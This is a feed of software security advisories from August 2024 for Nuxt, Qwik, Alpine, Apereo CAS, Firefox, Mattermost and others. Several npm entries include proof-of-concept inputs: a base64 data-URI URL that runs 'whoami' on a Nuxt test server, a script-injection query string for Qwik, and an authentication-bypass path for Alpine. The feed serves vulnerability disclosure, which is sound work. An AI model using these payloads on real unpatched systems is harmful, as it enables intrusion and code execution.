06.08.2024 00:19:01 | maven | [MAVEN:GHSA-P78H-M8PV-G9GM] Apereo CAS vulnerable to credential leaks for LDAP authentication (moderate) | Apereo CAS is an open source multilingual single sign-on solution for the web. Apereo CAS can be configured to use authentication based on client X509 certificates. These certificates can be provided via TLS handshake or a special HTTP header, such as "ssl_client_cert". When checking the validity of the provided client certificate, X509CredentialsAuthenticationHandler performs a check that this certificate is not revoked. To do so, it fetches the URLs provided in the "CRL Distribution Points" extension of the certificate, which are taken from the certificate itself and therefore can be controlled by a malicious user. If the CAS server is configured to use an LDAP server for X509 authentication with a password, for example by setting the "cas.authn.x509.ldap.ldap-url" and "cas.authn.x509.ldap.bind-credential" properties, X509CredentialsAuthenticationHandler fetches revocation URLs from the certificate, which can be LDAP URLs. When making requests to these LDAP URLs, Apereo CAS uses the same password as for the initially configured LDAP server, which can lead to a password leak. An unauthenticated user can leak the password used for the LDAP connection configured on the server. This issue has been addressed in version 6.6.6. Users are advised to upgrade. There are no known workarounds for this vulnerability. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P78H-M8PV-G9GM
06.08.2024 00:19:01 | maven | [MAVEN:GHSA-WHR2-9X5F-5C79] Alpine allows Authentication Filter bypass (moderate) | Alpine is a scaffolding library in Java. Alpine prior to version 1.10.4 allows Authentication Filter bypass. The AuthenticationFilter relies on the request URI to evaluate if the user is accessing the swagger endpoint. By accessing a URL with a path such as /api/foo;%2fapi%2fswagger, the `contains` condition will hold and the authentication filter will return without aborting the request. Note that the principal object will not be assigned and therefore the issue won't allow user impersonation. This issue has been fixed in version 1.10.4. There are no known workarounds. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-WHR2-9X5F-5C79
06.08.2024 00:19:01 | maven | [MAVEN:GHSA-2W4P-2HF7-GH8X] Alpine allows URL access filter bypass (high) | Alpine is a scaffolding library in Java. Alpine prior to version 1.10.4 allows URL access filter bypass. This issue has been fixed in version 1.10.4. There are no known workarounds. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2W4P-2HF7-GH8X
06.08.2024 00:19:01 | npm | [NPM:GHSA-6MVJ-2569-3MCM] Editor.js vulnerable to Code Injection (moderate) | Editor.js is a block-style editor with clean JSON output. Versions prior to 2.26.0 are vulnerable to Code Injection via pasted input. The processHTML method passes pasted input into the wrapper's innerHTML. This issue is patched in version 2.26.0. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6MVJ-2569-3MCM
05.08.2024 22:49:56 | npm | [NPM:GHSA-CXGV-PX37-4MP2] Nuxt Icon affected by a Server-Side Request Forgery (SSRF) (high) | Summary: `nuxt/icon` provides an API to allow client side icon lookup. This endpoint is at `/api/_nuxt_icon/[name]`. The proxied request path is improperly parsed, allowing an attacker to change the scheme and host of the request. This leads to SSRF, and could potentially lead to sensitive data exposure. Details: The `new URL` constructor is used to parse the final path. This constructor can be passed a relative scheme or path in order to change the host the request is sent to. This constructor is also very tolerant of poorly formatted URLs. As a result we can pass a path prefixed with the string `http:`. This has the effect of changing the scheme to HTTP. We can then subsequently pass a new host, for example `http:127.0.0.1:8080`. This would allow us to send requests to a local server. PoC: Make a request to `/api/_nuxt_icon/http:example.com`, observe the data returned has been fetched from a different resource than intended. I typically try to find an example within Nuxt infrastructure that is vulnerable to these types of bugs, but I could not identify any with this endpoint enabled. Impact: + SSRF, potential sensitive data exposure. + I do not believe this can be chained into an XSS, but it may be possible. + Does not have a security impact on services deployed on Cloudflare Workers. + Does not impact certain builds and modes (like static builds). + Can be mitigated by disabling the `fallbackToApi` option. Fix: + Ensure the host has not been changed after the path is parsed. + Alternatively, prefix the path with `./`. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CXGV-PX37-4MP2
05.08.2024 22:49:46 | npm | [NPM:GHSA-V784-FJJH-F8R4] Nuxt vulnerable to remote code execution via the browser when running the test locally (high) | Summary: Due to the insufficient validation of the `path` parameter in the NuxtTestComponentWrapper, an attacker can execute arbitrary JavaScript on the server side, which allows them to execute arbitrary commands. Details: While running the test, a special component named `NuxtTestComponentWrapper` is available (https://github.com/nuxt/nuxt/blob/4779f5906fa4d3c784c2e2d6fe5a5c5f181faaec/packages/nuxt/src/app/components/nuxt-root.vue#L42-L43). This component loads the specified path as a component and renders it (https://github.com/nuxt/nuxt/blob/4779f5906fa4d3c784c2e2d6fe5a5c5f181faaec/packages/nuxt/src/app/components/test-component-wrapper.ts#L9-L27). There is a validation for the `path` parameter to check whether path traversal is performed, but this check is not sufficient (https://github.com/nuxt/nuxt/blob/4779f5906fa4d3c784c2e2d6fe5a5c5f181faaec/packages/nuxt/src/app/components/test-component-wrapper.ts#L15-L19). Since `import(...)` uses `query.path` instead of the normalized `path`, a non-normalized URL can reach the `import(...)` function. For example, passing something like `./components/test` normalizes `path` to `/root/directory/components/test`, but `import(...)` still receives `./components/test`. By using this behavior, it's possible to load arbitrary JavaScript by using a path like the following: `data:text/javascript;base64,Y29uc29sZS5sb2coMSk`. Since `resolve(...)` resolves the filesystem path, not the URI, the above URI is treated as a relative path, but `import(...)` sees it as an absolute URI, and loads it as JavaScript. PoC: 1. Create a nuxt project and run it in the test mode: `npx nuxi@latest init test`, `cd test`, `TEST=true npm run dev`. 2. Open the following URL: `http://localhost:3000/__nuxt_component_test__/?path=data%3Atext%2Fjavascript%3Bbase64%2CKGF3YWl0IGltcG9ydCgnZnMnKSkud3JpdGVGaWxlU3luYygnL3RtcC90ZXN0JywgKGF3YWl0IGltcG9ydCgnY2hpbGRfcHJvY2VzcycpKS5zcGF3blN5bmMoIndob2FtaSIpLnN0ZG91dCwgJ3V0Zi04Jyk`. 3. Confirm that the output of `whoami` is written to `/tmp/test`. Demonstration video: https://www.youtube.com/watch?v=FI6mN8WbcE4. Impact: Users who open a malicious web page in the browser while running the test locally are affected by this vulnerability, which results in remote code execution from the malicious web page. Since web pages can send requests to arbitrary addresses, a malicious web page can repeatedly try to exploit this vulnerability, which then triggers the exploit when the test server starts. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-V784-FJJH-F8R4
05.08.2024 22:49:23 | npm | [NPM:GHSA-VF6R-87Q4-2VJF] nuxt vulnerable to Cross-site Scripting in navigateTo if used after SSR (moderate) | Summary: The `navigateTo` function attempts to block the `javascript:` protocol, but does not correctly use the APIs provided by `unjs/ufo`. This library also contains parsing discrepancies. Details: The function first tests to see if the specified [URL has a protocol](https://github.com/nuxt/nuxt/blob/fa9d43753d25fc2e8c3107f194b2bab6d4ebcb9a/packages/nuxt/src/app/composables/router.ts#L142). This uses the [unjs/ufo](https://github.com/unjs/ufo) package for URL parsing. This function works effectively, and returns true for a `javascript:` protocol. After this, the URL is parsed using the [`parseURL`](https://github.com/unjs/ufo/blob/e970686b2acae972136f478732450f6a2f1ab5e5/src/parse.ts#L47) function. This function will refuse to parse poorly formatted URLs. Parsing `javascript:alert(1)` returns null/"" for all values. Next, the protocol of the URL is checked using the [`isScriptProtocol`](https://github.com/unjs/ufo/blob/e970686b2acae972136f478732450f6a2f1ab5e5/src/utils.ts#L74) function. This function simply checks the input against a list of protocols, and does not perform any parsing. The combination of refusing to parse poorly formatted URLs, and not performing additional parsing, means that script checks fail as no protocol can be found. Even if a protocol was identified, whitespace is not stripped in the `parseURL` implementation, bypassing the `isScriptProtocol` checks. Certain special protocols are identified at the top of [`parseURL`](https://github.com/unjs/ufo/blob/e970686b2acae972136f478732450f6a2f1ab5e5/src/parse.ts#L49). Inserting a newline or tab into this sequence will block the special protocol check, and bypass the latter checks. PoC: POC - https://stackblitz.com/edit/nuxt-xss-navigateto?file=app.vue Attempt payload X, then attempt payload Y. Impact: XSS, access to cookies, make requests on user's behalf. Recommendations: As always with these bugs, the `URL` constructor provided by the browser is the safest method of parsing a URL. Given the cross-platform requirements of nuxt/ufo, a more appropriate solution is to make parsing consistent between functions, and to adapt parsing to be more consistent with the [WHATWG URL specification](https://url.spec.whatwg.org/). Note: I've reported this vulnerability here as it is unclear if this is a bug in ufo or a misuse of the ufo library. This ONLY has impact after SSR has occurred; the `javascript:` protocol within a location header does not trigger XSS. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VF6R-87Q4-2VJF
05.08.2024 22:48:58 | npm | [NPM:GHSA-RCVG-RGF7-PPPV] Nuxt Devtools has a Path Traversal: '../filedir' (high) | Summary: Nuxt Devtools is missing authentication on the `getTextAssetContent` RPC function, which is vulnerable to path traversal. Combined with a lack of Origin checks on the WebSocket handler, an attacker is able to interact with a locally running devtools instance and exfiltrate data abusing this vulnerability. In certain configurations an attacker could leak the devtools authentication token and then abuse other RPC functions to achieve RCE. Details: The `getTextAssetContent` function does not check for path traversals [(source)](https://github.com/nuxt/devtools/blob/c4f2b68281203fc3f61ffc97d9c6623fbfde46bb/packages/devtools/src/server-rpc/assets.ts#L88C48-L88C48); this could allow an attacker to read arbitrary files over the RPC WebSocket. The WebSocket server does not check the origin of the request [(source)](https://github.com/nuxt/devtools/blob/c4f2b68281203fc3f61ffc97d9c6623fbfde46bb/packages/devtools/src/server-rpc/index.ts#L109), leading to [CSWSH](https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking). This may be intentional to allow certain configurations to work correctly. Nuxt Devtools authentication tokens are placed within the home directory of the current user [(source)](https://github.com/nuxt/devtools/blob/c4f2b68281203fc3f61ffc97d9c6623fbfde46bb/packages/devtools/src/dev-auth.ts#L14). In the scenario that: + The user has a Nuxt3 Project running + Devtools is enabled and running + The project is placed within the user's home directory + The user visits a malicious webpage + The user has authenticated with devtools at least once, the malicious webpage can connect to the Devtools WebSocket, perform a directory traversal brute force to find the authentication token, then use the *authenticated* [`writeStaticAssets` function](https://github.com/nuxt/devtools/blob/c4f2b68281203fc3f61ffc97d9c6623fbfde46bb/packages/devtools/src/server-rpc/assets.ts#L96C11-L96C28) to create a new Component, Nitro Handler or `app.vue` file which will run automatically as the file is changed. PoC: The POC will exploit the Devtools server on localhost:3000 (you may need to manually restart the server as the restart hook does not always work). POC: https://devtools-exploit.pages.dev 1. Create a new project with nuxt.new. 2. Place the project inside your home directory. 3. Run `pnpm run dev`. 4. Open the POC page. The POC will: + Identify devtools version. + Leak your devtools token. + Create a new server handler with an insecure eval. Impact: + All new Nuxt projects by default (devtools is enabled) are vulnerable to arbitrary file read. + Certain Nuxt configurations are vulnerable to Remote Code Execution. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RCVG-RGF7-PPPV
05.08.2024 14:21:44 | ubuntu | [USN-6944-1] curl vulnerability | curl could be made to crash or expose information if it received specially crafted network traffic. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6944-1
05.08.2024 18:14:22 | npm | [NPM:GHSA-FFXG-5F8M-H72J] Rocket.Chat Server-Side Request Forgery (SSRF) vulnerability (high) | A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FFXG-5F8M-H72J
05.08.2024 03:00:00 | cisa | [CISA-2024:0805] CISA Adds One Known Exploited Vulnerability to Catalog (high) | CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. | https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0805
05.08.2024 03:00:00 | debian | [DSA-5736-1] openjdk-11 (high) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5736-1
05.08.2024 03:00:00 | debian | [DSA-5737-1] libreoffice (high) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5737-1
05.08.2024 16:51:27 | npm | [NPM:GHSA-49Q7-C7J4-3P7M] Elliptic allows BER-encoded signatures (low) | In the Elliptic package 6.5.6 for Node.js, ECDSA signature malleability occurs because BER-encoded signatures are allowed. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-49Q7-C7J4-3P7M
05.08.2024 16:51:06 | npm | [NPM:GHSA-977X-G7H5-7QGW] Elliptic's ECDSA missing check for whether leading bit of r and s is zero (low) | In the Elliptic package 6.5.6 for Node.js, ECDSA signature malleability occurs because there is a missing check for whether the leading bit of r and s is zero. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-977X-G7H5-7QGW
05.08.2024 16:21:12 | npm | [NPM:GHSA-F7Q4-PWC6-W24P] Elliptic's EDDSA missing signature length check (low) | In the Elliptic package 6.5.6 for Node.js, EDDSA signature malleability occurs because there is a missing signature length check, and thus zero-valued bytes can be removed or appended. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-F7Q4-PWC6-W24P
07.08.2024 07:09:07 | slackware | [SSA:2024-219-01] mozilla-firefox (critical) | New mozilla-firefox packages are available for Slackware 15.0 and -current to fix security issues. Here are the details from the Slackware 15.0 ChangeLog: `patches/packages/mozilla-firefox-115.14.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/115.14.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-34/ https://www.cve.org/CVERecord?id=CVE-2024-7519 https://www.cve.org/CVERecord?id=CVE-2024-7521 https://www.cve.org/CVERecord?id=CVE-2024-7522 https://www.cve.org/CVERecord?id=CVE-2024-7524 https://www.cve.org/CVERecord?id=CVE-2024-7525 https://www.cve.org/CVERecord?id=CVE-2024-7526 https://www.cve.org/CVERecord?id=CVE-2024-7527 https://www.cve.org/CVERecord?id=CVE-2024-7529 https://www.cve.org/CVERecord?id=CVE-2024-7531 (* Security fix *)`. Where to find the new packages: Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.14.0esr-i686-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.14.0esr-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-128.1.0esr-i686-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-128.1.0esr-x86_64-1.txz MD5 signatures: Slackware 15.0 package: a4b5568475ce482f390e8121e344f35a mozilla-firefox-115.14.0esr-i686-1_slack15.0.txz; Slackware x86_64 15.0 package: 9dc49ea62b99c69ec8018470cae37d5f mozilla-firefox-115.14.0esr-x86_64-1_slack15.0.txz; Slackware -current package: 46c301b42b9fa39d50a1262b4d64f2fd xap/mozilla-firefox-128.1.0esr-i686-1.txz; Slackware x86_64 -current package: 700d18fecff8418b343158b30716cc21 xap/mozilla-firefox-128.1.0esr-x86_64-1.txz. Installation instructions: Upgrade the package as root: `# upgradepkg mozilla-firefox-115.14.0esr-i686-1_slack15.0.txz` | https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-219-01
07.08.2024 01:30:29 | go | [GO-2024-3020] Mattermost allows a remote actor to permanently delete local data by abusing dangerous error handling in github.com/mattermost/mattermost-server (medium) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3020
07.08.2024 01:30:29 | go | [GO-2024-3022] Mattermost allows remote actor to set arbitrary RemoteId values for synced users in github.com/mattermost/mattermost-server (low) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3022
07.08.2024 01:30:29 | go | [GO-2024-3024] Mattermost allows a user on a remote to set their remote username prop to an arbitrary string in github.com/mattermost/mattermost-server (medium) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3024
07.08.2024 01:30:29 | go | [GO-2024-3025] Mattermost failed to disallow the modification of local users when syncing users in shared channels in github.com/mattermost/mattermost-server (high) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3025
07.08.2024 01:30:29 | go | [GO-2024-3030] Mattermost failed to properly validate synced reactions in github.com/mattermost/mattermost-server (low) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3030
07.08.2024 01:30:29 | go | [GO-2024-3031] Mattermost allows a remote actor to make an arbitrary local channel read-only in github.com/mattermost/mattermost-server (medium) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3031
07.08.2024 01:30:29 | go | [GO-2024-3044] lorawan-stack Open Redirect vulnerability in go.thethings.network/lorawan-stack (medium) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3044
07.08.2024 01:30:29 | go | [GO-2024-3045] Meshery SQL Injection vulnerability in github.com/layer5io/meshery (high) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3045
07.08.2024 01:30:29 | go | [GO-2024-3046] memos vulnerable to Server-Side Request Forgery in /api/resource in github.com/usememos/memos (medium) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3046
07.08.2024 01:30:29 | go | [GO-2024-3047] memos vulnerable to Server-Side Request Forgery in /o/get/httpmeta in github.com/usememos/memos (medium) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3047
07.08.2024 01:30:29 | go | [GO-2024-3048] RobotsAndPencils go-saml authentication bypass vulnerability in github.com/RobotsAndPencils/go-saml (high) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3048
07.08.2024 01:30:29 | go | [GO-2024-3049] memos vulnerable to Server-Side Request Forgery and Cross-site Scripting in github.com/usememos/memos (medium) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3049
07.08.2024 01:30:29 | go | [GO-2024-3050] Meshery SQL Injection vulnerability in github.com/layer5io/meshery (medium) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3050
07.08.2024 01:30:29 | go | [GO-2024-3051] Meshery SQL Injection vulnerability in github.com/layer5io/meshery (medium) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3051
07.08.2024 01:30:29 | go | [GO-2024-3052] gotortc vulnerable to Cross-Site Request Forgery in github.com/AlexxIT/go2rtc (high) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3052
07.08.2024 01:30:29 | go | [GO-2024-3053] gotortc Cross-site Scripting vulnerability in github.com/AlexxIT/go2rtc (medium) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3053
07.08.2024 01:30:29 | go | [GO-2024-3054] Owncast Cross-Site Request Forgery vulnerability in github.com/owncast/owncast (high) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3054
07.08.2024 01:30:29 | go | [GO-2024-3055] gotortc Cross-site Scripting vulnerability in github.com/AlexxIT/go2rtc (medium) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3055
07.08.2024 01:30:29 | go | [GO-2024-3056] Gitea Cross-site Scripting Vulnerability in code.gitea.io/gitea | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3056
06.08.2024 21:55:34 | npm | [NPM:GHSA-2RWJ-7XQ8-4GX4] Qwik has a potential mXSS vulnerability due to improper HTML escaping (moderate) | Summary: A potential mXSS vulnerability exists in Qwik for versions up to 1.6.0. Details: Qwik improperly escapes HTML on server-side rendering. It converts strings according to the following rules (https://github.com/QwikDev/qwik/blob/v1.5.5/packages/qwik/src/core/render/ssr/render-ssr.ts#L1182-L1208): if the string is an attribute value, `"` -> `&quot;`, `&` -> `&amp;`, other characters -> no conversion; otherwise, `<` -> `&lt;`, `>` -> `&gt;`, `&` -> `&amp;`, other characters -> no conversion. It sometimes causes the situation that the final DOM tree rendered on browsers is different from what Qwik expects on server-side rendering. This may be leveraged to perform XSS attacks; this type of XSS is known as mXSS (mutation XSS). PoC: A vulnerable component: `import { component$ } from "@builder.io/qwik"; import { useLocation } from "@builder.io/qwik-city"; export default component$(() => { /* user input */ const { url } = useLocation(); const href = url.searchParams.get("href") ?? "https://example.com"; return ( <div> <noscript> <a href={href}>test</a> </noscript> </div> ); });`. If a user accesses the following URL, `http://localhost:4173/?href=</noscript><script>alert(123)</script>`, then `alert(123)` will be executed. Impact: XSS | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2RWJ-7XQ8-4GX4
06.08.2024 21:55:45 | npm | [NPM:GHSA-F83W-WQHC-CFP4] Matrix SDK for React's URL preview setting for a room is controllable by the HS (moderate) | Impact: A malicious homeserver could manipulate a user's account data to cause the client to enable URL previews in end-to-end encrypted rooms, in which case any URLs in encrypted messages would be sent to the server. Although the CVSS score would be 4.1 ([AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N&version=3.1)), the maintainer classifies this as a High severity issue. Patches: This was patched in matrix-react-sdk 3.105.0. Workarounds: Deployments that trust their homeservers, as well as closed federations of trusted servers, are not affected. References: N/A. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-F83W-WQHC-CFP4
06.08.2024 03:00:00 | debian | [DSA-5738-1] openjdk-17 (high) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5738-1
06.08.2024 03:00:00 | debian | [DSA-5739-1] wpa | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5739-1
06.08.2024 03:00:00 | gentoo | [GLSA-202408-01] containerd: Multiple Vulnerabilities (high) | Multiple vulnerabilities have been discovered in containerd, the worst of which could lead to privilege escalation. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-01
06.08.2024 03:00:00 | gentoo | [GLSA-202408-02] Mozilla Firefox: Multiple Vulnerabilities (high) | Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could lead to remote code execution. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-02
06.08.2024 03:00:00 | mozilla | [MFSA-2024-33] Security Vulnerabilities fixed in Firefox 129 (high) | - CVE-2024-7518: Fullscreen notification dialog can be obscured by document content (high) Select options could obscure the fullscreen notification dialog. This could be used by a malicious site to perform a spoofing attack. - CVE-2024-7519: Out of bounds memory access in graphics shared memory handling (high) Insufficient checks when processing graphics shared memory could have led to memory corruption. This could be leveraged by an attacker to perform a sandbox escape. - CVE-2024-7520: Type confusion in WebAssembly (high) A type confusion bug in WebAssembly could be leveraged by an attacker to potentially achieve code execution. - CVE-2024-7521: Incomplete WebAssembly exception handling (high) Incomplete WebAssembly exception handling could have led to a use-after-free. - CVE-2024-7522: Out of bounds read in editor component (high) Editor code failed to check an attribute value. This could have led to an out-of-bounds read. - CVE-2024-7523: Document content could partially obscure security prompts (high) A select option could partially obscure security prompts. This could be used by a malicious site to trick a user into granting permissions. *This issue only affects Android versions of Firefox.* - CVE-2024-7524: CSP strict-dynamic bypass using web-compatibility shims (high) Firefox adds web-compatibility shims in place of some tracking scripts blocked by Enhanced Tracking Protection. On a site protected by Content Security Policy in "strict-dynamic" mode, an attacker able to inject an HTML element could have used a DOM Clobbering attack on some of the shims and achieved XSS, bypassing the CSP strict-dynamic protection. - CVE-2024-7525: Missing permission check when creating a StreamFilter (high) It was possible for a web extension with minimal permissions to create a `StreamFilter` which could be used to read and modify the response body of requests on any site. - CVE-2024-7526: Uninitialized memory used by WebGL (high) ANGLE failed to initialize parameters which led to reading from uninitialized memory. This could be leveraged to leak sensitive data from memory. - CVE-2024-7527: Use-after-free in JavaScript garbage collection (high) Unexpected marking work at the start of sweeping could have led to a use-after-free. - CVE-2024-7528: Use-after-free in IndexedDB (high) Incorrect garbage collection interaction in IndexedDB could have led to a use-after-free. - CVE-2024-7529: Document content could partially obscure security prompts (moderate) The date picker could partially obscure security prompts. This could be used by a malicious site to trick a user into granting permissions. - CVE-2024-7530: Use-after-free in JavaScript code coverage collection (moderate) Incorrect garbage collection interaction could have led to a use-after-free. - CVE-2024-7531: PK11_Encrypt using CKM_CHACHA20 can reveal plaintext on Intel Sandy Bridge machines (low) Calling `PK11_Encrypt()` in NSS using CKM_CHACHA20 and the same buffer for input and output can result in plaintext on an Intel Sandy Bridge processor. In Firefox this only affects the QUIC header protection feature when the connection is using the ChaCha20-Poly1305 cipher suite. The most likely outcome is connection failure, but if the connection persists despite the high packet loss it could be possible for a network observer to identify packets as coming from the same source despite a network path change. | https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-33
06.08.2024 03:00:00 | mozilla | [MFSA-2024-34] Security Vulnerabilities fixed in Firefox ESR 115.14 (high) | - CVE-2024-7519: Out of bounds memory access in graphics shared memory handling (high) Insufficient checks when processing graphics shared memory could have led to memory corruption. This could be leveraged by an attacker to perform a sandbox escape. - CVE-2024-7521: Incomplete WebAssembly exception handling (high) Incomplete WebAssembly exception handling could have led to a use-after-free. - CVE-2024-7522: Out of bounds read in editor component (high) Editor code failed to check an attribute value. This could have led to an out-of-bounds read. - CVE-2024-7524: CSP strict-dynamic bypass using web-compatibility shims (high) Firefox adds web-compatibility shims in place of some tracking scripts blocked by Enhanced Tracking Protection. On a site protected by Content Security Policy in "strict-dynamic" mode, an attacker able to inject an HTML element could have used a DOM Clobbering attack on some of the shims and achieved XSS, bypassing the CSP strict-dynamic protection. - CVE-2024-7525: Missing permission check when creating a StreamFilter (high) It was possible for a web extension with minimal permissions to create a `StreamFilter` which could be used to read and modify the response body of requests on any site. - CVE-2024-7526: Uninitialized memory used by WebGL (high) ANGLE failed to initialize parameters which led to reading from uninitialized memory. This could be leveraged to leak sensitive data from memory. - CVE-2024-7527: Use-after-free in JavaScript garbage collection (high) Unexpected marking work at the start of sweeping could have led to a use-after-free. - CVE-2024-7529: Document content could partially obscure security prompts (moderate) The date picker could partially obscure security prompts. This could be used by a malicious site to trick a user into granting permissions. - CVE-2024-7531: PK11_Encrypt using CKM_CHACHA20 can reveal plaintext on Intel Sandy Bridge machines (low) Calling `PK11_Encrypt()` in NSS using CKM_CHACHA20 and the same buffer for input and output can result in plaintext on an Intel Sandy Bridge processor. In Firefox this only affects the QUIC header protection feature when the connection is using the ChaCha20-Poly1305 cipher suite. The most likely outcome is connection failure, but if the connection persists despite the high packet loss it could be possible for a network observer to identify packets as coming from the same source despite a network path change. | https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-34
06.08.2024 03:00:00 | mozilla | [MFSA-2024-35] Security Vulnerabilities fixed in Firefox ESR 128.1 (high) | - CVE-2024-7518: Fullscreen notification dialog can be obscured by document content (high) Select options could obscure the fullscreen notification dialog. This could be used by a malicious site to perform a spoofing attack. - CVE-2024-7519: Out of bounds memory access in graphics shared memory handling (high) Insufficient checks when processing graphics shared memory could have led to memory corruption. This could be leveraged by an attacker to perform a sandbox escape. - CVE-2024-7520: Type confusion in WebAssembly (high) A type confusion bug in WebAssembly could be leveraged by an attacker to potentially achieve code execution. - CVE-2024-7521: Incomplete WebAssembly exception handling (high) Incomplete WebAssembly exception handling could have led to a use-after-free. - CVE-2024-7522: Out of bounds read in editor component (high) Editor code failed to check an attribute value. This could have led to an out-of-bounds read. - CVE-2024-7524: CSP strict-dynamic bypass using web-compatibility shims (high) Firefox adds web-compatibility shims in place of some tracking scripts blocked by Enhanced Tracking Protection. On a site protected by Content Security Policy in "strict-dynamic" mode, an attacker able to inject an HTML element could have used a DOM Clobbering attack on some of the shims and achieved XSS, bypassing the CSP strict-dynamic protection. - CVE-2024-7525: Missing permission check when creating a StreamFilter (high) It was possible for a web extension with minimal permissions to create a `StreamFilter` which could be used to read and modify the response body of requests on any site. - CVE-2024-7526: Uninitialized memory used by WebGL (high) ANGLE failed to initialize parameters which led to reading from uninitialized memory. This could be leveraged to leak sensitive data from memory. - CVE-2024-7527: Use-after-free in JavaScript garbage collection (high) Unexpected marking work at the start of sweeping could have led to a use-after-free. - CVE-2024-7528: Use-after-free in IndexedDB (high) Incorrect garbage collection interaction in IndexedDB could have led to a use-after-free. - CVE-2024-7529: Document content could partially obscure security prompts (moderate) The date picker could partially obscure security prompts. This could be used by a malicious site to trick a user into granting permissions. - CVE-2024-7531: PK11_Encrypt using CKM_CHACHA20 can reveal plaintext on Intel Sandy Bridge machines (low) Calling `PK11_Encrypt()` in NSS using CKM_CHACHA20 and the same buffer for input and output can result in plaintext on an Intel Sandy Bridge processor. In Firefox this only affects the QUIC header protection feature when the connection is using the ChaCha20-Poly1305 cipher suite. The most likely outcome is connection failure, but if the connection persists despite the high packet loss it could be possible for a network observer to identify packets as coming from the same source despite a network path change. | https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-35
06.08.2024 03:00:00 | mozilla | [MFSA-2024-37] Security Vulnerabilities fixed in Thunderbird 128.1 (high)
In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potential risks in browser or browser-like contexts.
https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-37

06.08.2024 03:00:00 | mozilla | [MFSA-2024-38] Security Vulnerabilities fixed in Thunderbird 115.14 (high)
In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potential risks in browser or browser-like contexts.
https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-38

07.08.2024 19:00:00 | cisco | [CISCO-SA-ISE-XSS-V2BM9JCY] Cisco Identity Services Engine Stored Cross-Site Scripting Vulnerabilities (medium)
Multiple vulnerabilities in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-XSS-V2BM9JCY

